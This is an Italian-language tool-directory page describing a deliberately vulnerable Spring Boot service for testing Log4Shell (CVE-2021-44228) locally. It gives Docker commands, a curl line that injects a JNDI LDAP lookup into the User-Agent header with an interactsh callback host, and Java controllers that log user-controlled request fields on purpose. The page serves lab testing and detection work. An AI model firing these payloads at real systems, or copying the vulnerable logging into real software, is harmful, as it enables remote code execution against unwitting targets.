Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service | Kitploit
Strumenti/GitHubGitHub/zsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubzsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service

Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1324 anni faNon ancora revisionato

CVE-2021-44228 Servizio di test Spring Boot

Questo è un progetto hello world spring boot fatto con un hack sporco per testare localmente i tuoi strumenti/payload/capacità di rilevamento prima di colpire i target di produzione con essi.

La versione di Log4j configurata è 2.13.0

Creazione dell'immagine docker

root@kitploit:~
bash build.sh

Esecuzione dell'immagine docker

root@kitploit:~
docker run -p 8080:8080 dwdi/log4shell

Test / Innesco di CVE-2021-44228

Se non hai burp collaborator in esecuzione nel garage, puoi visitare questo sito per un'esperienza simile: https://interactsh.com

root@kitploit:~
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null

Strumento di scansione

Opzionalmente puoi usare questo fantastico repo per effettuare scansioni locali/di massa: https://github.com/adilsoybali/Log4j-RCE-Scanner

Punti di innesco

Questa vulnerabilità consiste essenzialmente nel forzare un valore controllato dall'utente a essere registrato dal framework di logging vulnerabile. Con questo in mente, questa semplice applicazione fittizia supporta due verbi HTTP (GET/PUT) e una serie di punti di iniezione:

root@kitploit:~
@GetMapping("/")
	public String index(HttpServletRequest request) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		return "Log4J2 is working!";
	}
root@kitploit:~
@PostMapping("/")
	public String post(HttpServletRequest request, @RequestBody String body) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		logger.info("Request Body: " + body); // mind the extra request body
		return "Log4J2 is working!";
	}

Contributi / miglioramenti sono benvenuti.

Scusate per la qualità del codice :) questo progetto non è per mettersi in mostra ma per condividere/aiutare.

Scarica lo strumento